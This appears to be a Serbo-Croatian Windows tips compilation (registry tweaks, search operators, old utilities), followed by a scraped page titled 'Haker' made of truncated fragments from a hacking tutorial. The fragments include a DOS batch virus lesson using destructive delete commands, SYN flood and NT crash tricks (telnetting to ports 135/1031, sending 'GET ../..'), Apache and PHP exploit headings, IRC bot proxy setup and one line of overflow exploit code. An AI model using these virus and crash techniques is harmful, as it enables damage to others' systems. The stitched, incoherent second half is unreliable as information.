Recimo da je vam je folder My Documents najposeceniji folder na hard

disku i recimo da cesto koristite Wordpad. Kliknte desnim dugmetom na
ikonu Worpada i pod Start In otkucajte C:\My Documents. Od sada svaki
put kada otvarate neki fajl u Wordpadu Dialog box ce vas odvesti
direktno u My Documents folder.
Sa Windowsom 98 SE dolazi mali utility sa kojim mozete da editujete i

menjate vremenske zone. Mozete ga naci na instalacionom CDu u folderu
Tools\Reskit\Config\tzedit.exe
Zelite li browser bez ivica? Otkucajte pod RUN "iexplore -k

javascript: moveTo(100,100); resizeTo(500,400)" i dobicete Internet
Explorer koji nema ni jednu ivicu...Ivicu?
U triku 240 je spominjana komanda FC koja uporredjuje dva fajla i

izbacuje rezultat u okviru teksta sa promenama. Korisnici Windowsa
98/2000 slican program, ali sada u Windows verziji, mogu naci na
instalacionom CDu za ovaj operativni sistem. Lokacija za W98 je Tools \
Reskit \ Files a za W2000 Support \ Tools folder\SUPPORT.CAB.
Startujte fajl WINDIFF.EXE
Kako pronaci sliku na internetu koja se zove npr. FOTKA? Uz Alta Vistu
sve je moguce. Dovoljno je da u search fieldu otkucate 'image:fotka'
Doslo je vreme prvom triku za Windows ME. Kada neki program 'pukne'
obicno kliknete na Details u nadi da cete saznati sta je prouzrokovalo
pad programa. Medjutim, ljudi iz MSa su se odlucili da ukinu dugme
Details iz ko zna kojih razloga, ali kombinacija tastera ALT+D dace vam
ono sto ste vec navikli da vidite - detalje.
Kako saznati koliko puta ste startovali neki program ili igru? Dovoljno je
samo da pogledate fajl 'OPTLOG.TXT' i sve sto ste dosad startovali
videcete upisano i odbrojano. Inace, ovaj fajl koristi MS Scan Disk da bi
fajlove koje najcesce koristite stavio na pocetak diska jer ce tada biti
brze procitani.
Da li zelite da saznate sta se promenilo u Registry-ju posle instalacije

neke aplikacije? Pre nego sto bilo sta pocnete da instalirate startujte
Regedit i odaberite opciju 'Export Registry File' i nazovite ga 'pre.reg'.
Instalirajte sta ste vec naumili pa ponovo odaberite opciju za Export ali
ga ovaj put nazovite 'posle.reg'. Idite na Start/Run i otkucajte
"fc pre.reg posle.reg > promene.txt" (sa navodnicima).
Stara dobra DOS komanda FC radi i u Windowsu i uporedice ova dva fajla
i promene napisati u fajlu 'promene.txt'
Da li su vas ikada nervirali fontovi na nekim web stranama? Negde su

isuvise mali, negde su veliki, negde su cudne boje a negde necitljivi.
Ukoliko zelite da premostite formatizovanje fontova u IE idite do
Internet Options/Accessibility i tamo zavrsite posao.
Interesuje vas sa kojim je sve sajtovima neki sajt linkovan? Otkucajte u

Alta Visti npr. 'link:formula1.com' i videcete sve linkove koji poticu sa
sajta formula1.com
Kako na internetu pretrazivati URL adrese? Ukoliko vas npr. zanimaju

sve web adrese u cijem se URLu pominje rec 'phone' dovoljno je da na
Alta Visiti otkucate upit 'url:phone'
Na Unixu vec odavno postoji opcija da kada misem predjete preko

neaktivnog prozora on postaje aktivan. Ukoliko to zelite i u Windowsu
evo sta treba da uradite. Sa Regeditom idite do
HKEY_CURRENT_USER\Control Panel\Mouse, napravite DWORD stavku
sa imenom ActiveWindowTracking, dodelite mu vrednost 1 i restartujte
sistem
Evo par switcheva za Scan disk. Moze ti ih koristiti sa npr. Run

komandom iz Start menija. 'SCANDSKW /A' ce izvrsiti auto-selekciju
vaseg harda, 'SCANDSKW /N' ce poceti scan bez nepotrebnih pitanja,
'SCANDSKW /P' ukljucuje preview mod a 'SCANDSKW /SILENT'
ukljucuje silent mod u kojem nemate mogucnost biranja opcija.
Koristite li Telnet u Windowsu? Zelite li Smooth Scrolling. Idite do

HKEY_CURRENT_USER \ Software \ Microsoft \ Telnet i promenite
vrednost stavke "SmoothScroll" u 1.
Koja je najbolja zastita protiv destruktivnih virusa koji npr. formatizuju

hard disk bez znanja korisnika? To nije ni jedan od anti-virusnih
programa. Dovoljno je da preimenujete fajl FORMAT.EXE u npr.
FORMAT1.EXE. Ovo bi ste takodje mogli primeniti i na fajl FDISK.EXE
Zelite li da promenite prioritet vaseg CPU-a? Idite do

HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \VxD \
BIOS i u desnom panelu napravite DWORD stavku sa imenom
"CPUPriority". Dodelite mu vrednost 1 u decimalnom formatu i rebutujte.
Programi i ceo sistem bi trebao da se odaziva brze.
Dok Disk Defragmenter radi svoj posao startovanje Screen Savera nije
preporucljivo jer ce posao morati da se radi iz pocetka. Da ne bi ste
vrteli misa ukrug za vreme defragmentacije, posegnite za elegantnijem
resenju. Sa Regeditom idite do HKEY_CURRENT_USER \ Software \
Microsoft\ Windows \ CurrentVersion \ Applets i napravite novi key
"Defrag". Pod njim napravite key "Settings" a unutar njega novi key
"DisableScreenSaver" i dodelite mu vrednost "Yes". Sledeci put kada se
startuje Defrag, Screen Saver ce biti deaktiviran.
Uz pomoc ovog trika svaki put kada se startuje Windows pojavice se

prozor sa proizvoljnim tekstom koji ste vi napisali. Ovo je zgodna stvar
ukoliko zelite nesto vazno da napomenete korisnicima racunara ili da im
skrenete paznju na nesto. Sa Regeditom idite do
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon i napravite
stavku LegalNoticeCaption i ubacite tekst koji zelite.
Imate instaliran Windows 98 i u poslednje vreme radi nestabilno?

Ukoliko zelite da vratite Windows 98 u ispravno stanje t.j. stanje koje
ste imali kada ste ga prvi put instalirali, uradite sledece. Butujte PC sa
Windows 98 Boot diskom, ubacite Windows 98 CD i otkucajte "D:SETUP
/Pf" (bez navodnika) ukoliko je D vas CD- ROM. Sa ovom komandom
cete Windows 98 vratiti u "factory state" i u 99% slucajeva popraviti sve
probleme u sistemu.
Sigurno ste vec sto puta culi o Cookies-ima i o njihovom uticaju na vasu
privatnost dok surfujete webom. Standardna je preporuka da ih sa
vremena na vreme obrisete, ali time mozete dosta izgubiti na komforu
pri surfovanju webom, pogotovo na onim sajtovima koje cesto
posecujete. U IE5 postoji zgodna opcija 'Export Cookies' koja vas moze
spasti nevolja. Pre nego sto obrisete Cookie idite na File/ Import Export
i izaberite 'Export Cookies' i snimite ga u fajl. Ukoliko nesto ne bude
valjalo posle brisanja sa komandom Import mozete sve vratiti u
predjasnje stanje.
Korisnici Netscape-a mogu lako da pogledaju sta se desava u njihovom

gradu veceras ili sta igra u bioskopu. Dovoljno je samo da otkucaju npr.
'zip 90210' i saznace sta se desava na Beverly Hillsu. Ova opcija za sada
radi samo da US podrucje.
Ukoliko imate NT4 i vise od 64MB RAMa postarajte se da vam je stavka

DisablePagingExecutive stavljena na 1. Ovim ce sistem iskorisiti svu
raspolozivu memoriju. Putanja do ove stavke je HKEY_LOCAL_MACHINE
\ System \ CurrentControlSet \ Control \Session Manager \ Memory
Management \ DisablePagingExecutive
Ukoliko primetite da vam se sistem ponasa cudno t.j. nestablino,

potrazite fajl Bootlog.txt u rutu hard diska. Potrazite stavke 'Fail'.
Videcete koji drajveri fale i koji nisu mogli biti ucitani. Njih verovatno
posedujete na instalacionom CDu Windowsa pa ih tamo i potrazite i
prekopirajte negde u Windowsov 'path'. Primeticete da se stvari rade
bolje. Ukoliko nemozete da nadjete fajl Bootlog.txt ubacite u MSDOS.SYS
stavku "DISABLELOG=0"
Ukoliko instalirate Internet Explorer sa Windows Desktop update-om

moze se dogoditi na vam nestane NEW komanda iz menija koji dobijate
kada desnim dugmetom kliknete da desktop. Ovo je klasican MS bug a
popravlja se tako sto cete vresnosti u registry bazi vratiti na sledece:
Key: [HKEY_CLASSES_ROOT\Directory\Background\ shellex\
ContextMenuHandlers\New]
Value Name: (Default)
Data Type: REG_SZ
Data: {D969A300-E7FF-11d0-A93B-00A0C90F2719}
Koliko puta ste, surfujuci webom, videli neku jako dobru Macromedia
Flash animaciju a niste bili u mogucnosti da je snimite jer takva opcija
jednostavno ne postoji? Resenje ovog problema je da dok u browseru
gledate Flash animaciju, pomocu Find komande, potrazite *.SWF fajlove
i prekopirajte ih u neki drugi folder. Najverovatnije taj fajl necete moci
otrvoriti duplim klikom na njega nego cete ga uz pomoc drag&dropa
prebaciti u IE a on ce vec uraditi svoj deo posla.
Da li znate da je moguce promeniti kolicinu memorije koju ce koristiti

svaki IRQ port pojednicno? Otvorite System.ini fajl u iu sekciji [386enh]
dodajte stavku IrqX=4096 gde je X broj IRQ porta. Snimite i rebutujte.
Ovim povecavate rezervisanu memoriju za IRQ port i time uvecavate
njegove performanse. U praksi se pokazalo da najvece dobitke ostvaruju
mrezne kartice, tako da ukoliko je posedujete obavezno ovo uradite.
Uz pomoc ovog trika u meniju koji dobijete kada desnim dugmetom

kliknete na bilo koji folder dobicete opciju 'Explore from here' sto ustvari
znaci da ce se kada kliknete na tu opciju otvoriti novi Explorer tog
foldera. Idite do KEY_CLASSES_ ROOT\Directory\shell\Explore (ako ne
postoji-napravite) i promenite vrednost 'Default' u 'Explore from here'.
Napravite novu key pod 'Explore' sa imenom 'command' i editujte
Default vrednost u 'explorer.exe /e,/root,/idlist,%i'
Ukoliko ste npr. instalirali Windows na posebnu particiju i ne zelite da se

na tu particiju bilo sta upisuje sto nije vezano za sitem pa ni fajlovi
Outlook Expressa, evo nacina kako da promenite putanju do foldera gde
ce OE upisivati e-mailove i news poruke. Sa Regeditom idite do
HKEY_CURRENT_ USER\Software\Microsoft\Outlook Express i u stavku
'Store Root' upisite novu putanju do zeljenog foldera.
Nervira li vas beep iz PC Speakera? Ukoliko zelite da ga iskljucite sa

Regeditom idite do HKEY_CURRENT_USER\ Control Panel\Sound i
pronadjite stavku Beep. Ukoliko ne postoji napravite je(New/ String
Value). Stavci dodelite vrednost No (ili Yes ukoliko se predomislite) i vas
Speaker ce po sledecem startovanju Windowsa biti iskljucen.
Da li ste ikada naleteli na neke brojke tipa 404 dok ste surfovali webom?
404 ustvari znaci da sajt nije nadjen, 401 -neovlascen zahtev, 402
-obavestenje da je potrebna uplata, 403 - zabranjen pristup, 408 -time-
out zahteva, 500 - greska u serveru(internom), 501 -non-implemented
server-side facility, 503- preopterecen server
Ukoliko zelite da kontrolisete kako ce se vas Windows butovati editujte

fajl MSDOS.SYS koji se nalazi u rutu. Prvo mu iskljucite Read-Only
atribut - ukoliko ne znate kako, ovo nije za vas. U sekciji [Options]
postoje sledece stavke a vrednost '1' znaci DA a '0' znaci NE. BootGUI=1
(boot into Windows); DblSpace=0 (load DoubleSpace drivers);
DrvSpace=0 (load DriveSpace drivers); LoadTop=1 (load
command shell in upper memory); BootMenu=1 (turn on boot menu-
preporucljivo); BootMenuDefault=1 (choice in boot menu);
BootMenuDelay=2 (seconds to delay boot menu); BootKeys=1
(keyboard shortcuts for more booting options); Logo=1 (see the
Windows splash screen); AutoScan=0 (automatically scandisk after a
'bad' shutdown); BootWarn=0 (warning about going into Safe mode);
DisableLog=0 (boot up logging
Windows 2000 dolazi sa novim instalerom zvanim 'Microsoft Windows

Installer'. Buduce instalacije dolazice u novom formatu .MSI pa ukoliko
zelite da otvorite ovakav fajl moracete ovo instalirati. Microsoft je novi
instaler preuredio za Windows 95, 98, NT pa ga slobodno mozete
preuzeti sa:
www.microsoft.com/msdownload/platformsdk/instmsi.htm
U Windowsu 98 se desava da se CD ne startuje automatski po

ubacivanju u drajv. Ovaj bag se resava tako sto cete u registriju otici do
[HKEY_CURRENT_USER\Software\ Microsoft\
Windows\CurrentVersion\Policies\Explorer] i napraviti novu stavku sa
imenom NoDriveTypeAutoRun sa vrednoscu 0000 95 00 00 00
Smetaju vam neke ikone u Control Panelu i zeleli bi da ih se otarasite.
Nista lakse! Trazite fajlove sa ekstenzijom *.CPL. Ove fajlove mozete
skloniti iz System foldera ali budite oprezni - neki su zaista neophodni.
Sigurniji nacin je da u Control.ini fajlu u sekciji [don't load] upisete koje
fajlove Windows ne treba da ucita. Npr. ukoliko ne zelite da vam se ucita
Quick Time aplet za Control Panel onda cete u pomenutoj sekciji upisati
"quicktime.cpl=no" (bez navodnika)
Koji je najbrzi nacin kreiranja shortcuta? Ne znam, ali ovaj sigurno treba
uzeti u obzir. Dok ste u Win Exploreru odvucite ikonu iz gornjeg levog
ugla na desktop i dobicete shortcut za folder u kojem ste se nalazili. Ovo
isto mozete koristiti i u IE da bi na najlaksi nacin dobili shortcut na
desktopu za odredjeni URL.
Prilikom kopiranja programa sa CD-a moze se dogoditi da program

odbija da radi. Ukoliko ste sigurni da je CD dobro snimljen onda jedini
problem moze biti u tome sto su prekopirani fajlovi u READ ONLY modu.
Oznacite sve fajlove i u Properties iskljucite Read Only.
Imate malo mesta na hard disku i zelite da napravite malo mesta?

Ukoliko zelite instant 7 MB vise na vasem hardu idite do foldera
C:\Windows\Help i obrisite sve AVI fajlove jer oni predstavljaju tutorial
Windowsa a predpostavljam da vam to vise ne treba.
Kako da ogranicite pretragu na Altavisti na samo jedan domen? Ukoliko

npr. zelite da pretrazite rec MP3 samo u "yu" domenu korisitite sledecu
sintaksu "host:.yu mp3".
Jedan od glavnih uzroka pada sistema je koriscenje starih 16. bitnih

programa. Kako da na najbrzi nacin saznate da li je program 16. ili 32.
bitan? Otvorite EXE fajl programa u Quick View-u i informacije o njemu
su pred vama. Ako je program 16. bitan pokusajte da pronadjete noviju
verziju, update ili cak njegovu 32. bitnu verziju.
Jedan od najlaksih provera sistema na viruse trojance je da u DOS

Prompt-u otkucate "netstat -a" (bez navodnika). Ova komanda ce vam
dati prikaz svih otvorenih portova. Treba je startovati dok racunar nije
povezan na internet i proveriti da li postoji neki otvoreni port koji ima
status "Listening". Ako je broj porta ispod 1024, velika je verovatnoca
da se radi o nekom sistemskom servisu. Medutim, ako je broj iznad 1024
proverite sistem sa nekim anti-virusnim programom.
Kolega na poslu predugo drzi rekord u Minesweeperu? Rekord bi veoma

lako oborili samo da nema tog prokletog sata, zar ne? Da bi zaustavili
sat kliknite bilo gde na tablu da bi pocelo da tece vreme. Pritisnite
zajedno levo i desno dugme misa i taster ESCAPE i do kraja radnog
vremena rekord ce biti vas! :)
Znate li Easter Egg Helpa Windowsa 95? Idite na Start/ Help i izaberite
Find. Ukoliko dosad niste napravili index bazu napravite je. Pod Options
treba da vam bude ukljuceno "All the words you typed in any order" i
"begin with the characters you type" a ostalo nije bitno. Kliknite na OK.
Pod Find otkucajte "Who knows who built this tool?" (bez navodnika sa
velikim W) i drzite SHIFT i CTRL pa kliknite na Clear. Opet idite pod
Options ali ovaj put stavite "At least one of the words you typed" i
"contain the characters you type". Kliknite na OK pa otkucajte "The
Shadow knows!" (bez navodnika sa velikim T i S). Drzite SHIFT i CTRL pa
opet Clear i Easter Egg je tu!
Koristite li BCC kada saljete e-mail na vise korisnika? Koriscenjem BCCa

(Blind Carbon Copy) mozete poslati isti email na vise e-mail adresa a da
pritom oni koji su dobili taj e-mail ne znaju kome ste jos poslali. Koliko
postujete privatnost drugih toliko ce i drugi postovati vasu.
Verovatno ste primetili da svaki put kada editujete DOC fajl u

Wordu97/2K oni budu veci bez obzira koliko brisali unutar njega. Ova
pojava se desava zbog opcije Auto Save, koju treba iskljuciti, a da bi
DOC fajlove sveli na razumne duzine otvorite ih pa ih snimite sa Save As.
Primeticete da su fajlovi dosta manji.
Zelite da editujete sistemske ini fajlove? Uvek je dobro imati ih sve

zajedno otvorene zbog bolje preglednosti. Za tu svrhu najbolje ce vam
posluziti program Sysedit (windows\system\ sysedit.exe) koji
automatski otvara Autoexec.bat, Config.sys, Win.ini, System.ini i
Protocol.ini pa tako editovanje postaje znatno lakse.
Dok ste citali postu u Outlook Expressu pukao vam je sistem ili mozda
nestala struja? Po sledecom startovanju sistema startovace vam se Scan
Disk i naci ce gresku u Outlook-ovom history fajlu. Popravite ga. Kada
budete startovali OE, poruku koju ste citali necete moci da vidite zbog
toga sto OE nije bio propisno ugasen. Ali ovo ne treba da vas plasi jer
poruka je jos uvek tu. Dovoljno je samo da klikete na bilo koji drugi e-
mail pa posle toga ponovo na problematicni i sada nece biti problema.
Desilo vam se da u browseru dobijete potpuno drugu web stranicu od

zahtevane? E pa doslo je vreme da pocistite Cache t.j. Temporary
Internet fajlove jer je vas omiljni browser pocelo pomalo da brlja.
Kako na najbrzi nacin startovati Windows Explorer? Ukoliko imate

Windows tastaturu pritisnite Winkey + E i to je to!
Ukoliko radite sa Windows Explorerom verovatno ste primetili da ukoliko

pokusate da upravo snimljeni fajl na disketu presnimite na hard disk radi
provere(posto su diskete prilicno nepouzdane), sistem ga nece uopste
citati sa diskete nego ce ga direktno iz buffera presnimiti na hard. Da bi
pocistili buffer flopi diska jednostavno izbacite i ubacite diksetu u flopi i
tek ce sada fajl sa diskete biti procitan i presnimljen na hard.
Nervira li vas onaj ruzni font u Notepadu? Ukoliko zelite da ga promenite

moracete da cepkate malo po registry-ju. Idite do:
HKEY_CURRENT_USER\Software\Microsoft\Office\ 8.0\ Word\Options i
promenite "fixedfon.fon" u novi font.
Napomena: TrueType(.TTF) fontovi nisu podrzani
Ako ste jedan od mnogobrojnih koji su potpuno zapostavili svoju
numericku tastaturu (da, to su oni tasteri sa strane gde se uhvatila
paucina) evo nacina kako da ih najbolje iskorisite u Windowsu. Svaka
ikona na desktopu moze imati svoju precicu (shortcut) preko tastature
t.j. hot key. Da bi ste konfigurisali "vruce tastere" kliknite desnim
dugmetom na desktop ikonu i izaberite Properties/ Shortcut. Na
Shortcut Key kliknite jedanput i potom pritisnite taster(sa numericke
tastature) koji ce ubuduce biti precica sa startovanje tog programa.
Kako startovati IE bez ikakvih ikona, tool i status barova?

Start/ RUN/ i otkucajte "iexplore -k http://www.domain.com/"
Da bi ste brze resetovali masinu (Start/Shutdown/Restart) drzite SHIFT

taster pre nego sto kliknete na OK
Ukoliko necete da vam se automatski startuje CD, drzite SHIFT taster pri
ubacivanju CD-a.
Auto search opcija u Internet Exploreru je sjajna stvar ali samo za

domene .com, .edu, ili .org . Dodajte sami jos neke domene, kao sto su
.net ili jos bolje .co.yu tako sto cete sa Regeditom otici na
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Internet
Explorer > Main > UrlTemplate i tamo uneti ono sto vam treba
Kada trazite fajlove sa Windows Find (Start/Find) obelezite neki fajl od

pronadjenih i preko File menija potrazite opciju 'Open Containing
Folder'. Ukoliko upotrebite ovu opciju naci cete se u folderu gde je fajl,
koji ste trazili, pronadjen!
Ukoliko vam cesto "puca" veza sa vasim provajderom pokusajte da

uradite sledece. Idite na Control Panel\ Modems\ Properties\
Connection i na kraju Advanced i pod Extra settings otkucajte "S10=50"
(bez navodnika). Ovo bi trebalo da "ojaca" izdrzljivost modema. Ukoliko
imate vise unosa pod Extra Settings razdvojte ih razmakom
To je vecina trikova koji postoje u windowsima, ali ima njih jos puno koji
su ostali ne istrazeni ali i oni ce uskoro biti na ovim stranicama....uskoro
ocekujte nastavak ovih trikova naravno dok odmorim malkice prste.
P.S. Htio bih da napomenem da ovo nisu sve moji trikovi oni su skidani
sa svih strana pomalo...
------------------------------------------------------------------

Haker

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Haker

Uploaded by

Copyright:

Available Formats

Internet Fazoni

Kako postati HACKER ?

Hackanje Sifre putem ftp.

* U ovom tutoru mozete naci neke veoma korisne

* Access denied (nekoj web stranici)

Zelite li da sprijecite pristup nekoj web stranici

Identifikacija poziva je sjajna stvar, zar ne?

* Brisanje URL adrese u IE

Ukoliko zelite da izbrišete URL adrese u

* Fazon u Outlook Express-u

Kada ubacujete mail attachment u Outlook Expressu,

* Combine and Decode u Outlook Expressu

Znate li za opciju Combine and Decode u Outlook Expressu?

Ukoliko zelite da na najlakši nacin, bez upotrebe

Da li zelite saznat vasu IP adresu kada se konektujete na

P.S. "Naravno ove fazone nisam ja otkrio, nego samo sakupio

DOS batch virusi

-su virusi koji se završavaju sa ekstenzijjom .bat. Mogu sadržavati DOS

cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive (u većini

RD direktorij - ova komanda će izbrisati direktorij. Ovo je teško objasniti.

@del fajl - ova komanda briše odredjeni fajl u odredjenom direktoriju pa

End - ova komanda završava i izlazi iz programa.

Sada kada znate osnovne komande možemo krenuti sa učenjem kako da

Do sada bi trebao da shvatiš kako ovi virusi rade.

UPOZORENJE: Nemojte sa ovim jednostavnim virusima neke veće

E pa ovako da krenemo od samog pocetka ... znaci skinete miRC sa

Zatim, /connect/add ... prvi red je "Description" tu upisite samo ime

E,sad idemo na ono ... Kako da instaliram bota ? : )

Logujete se na shell ... kao ono za bota : ) i kucate

Ukljucite miRC/options/Firewall ... chekirate "Use SOCKS firewall"

host - mail.bias.bm | port - 1080

... NickServ,ChanServ,MemoServ,SeenServ ...

Evo nekih servera :

hmm koji jos znam ... ? a da ...

Kako postati HACKER!

Ovaj tekst nisam ja napisao nego "drakelord" ja sam ga samo prepisao

Takoder, morate znati još nešto važno, a to je razlika izmedu

Vi morate imati oboje da bi postali hackerom. Morate imati

"Znanje je poput kamena. Kamenom se mogu napraviti velike

2. SYN Flood Attack

4. Exploit za NT 3.5x rachunare

6. Stvaranje backspace.bat fajla na serveru

7. Apache HTTP Server - Exploit

8. PHP Path Revealing Vulnerability

9. Sakrivanje IP broja u mIRCu

10. Trik u SoftICE za crackere koji nisu znali

1. Con, Aux i Nul Exploit

Nakon ovoga rachunar ce da se zamrzne i jedino reshenje bice

2. SYN Flood Attack

4. Exploit za NT 3.5x rachunare

b) Ako se u toku konekcije na Port 135 telnetujete i ukucate 10 ili

c) Ako se telnetujete na port 1031 i ako ukucate 10 ili vishe

d) Telnetovanjem na port 80 i ukucavanjem 'GET ../..' takodje

Model obezbedjenja u NT-u se sastoji iz cetiri dela:

1 Local Securitu Autority

NT koristi Server Message Block za kontrolu slanja podataka.

6. Stvaranje backspace.bat fajla na serveru

7. Apache HTTP Server - Exploit

8. PHP Path Revealing Vulnerability

Fatal error: Unable to open /vhmap/i/n/server.com/he.php3 in - on line

Reshenje ovog problema je iskljucivanje error_reporting-a, ali ovo

9. Sakrivanje IP broja u mIRCu

10. Trik u SoftICE za crackere koji nisu znali

------- Hacking Web-site -------

long get_esp(void) { asm("movl %esp,%eax\n"); }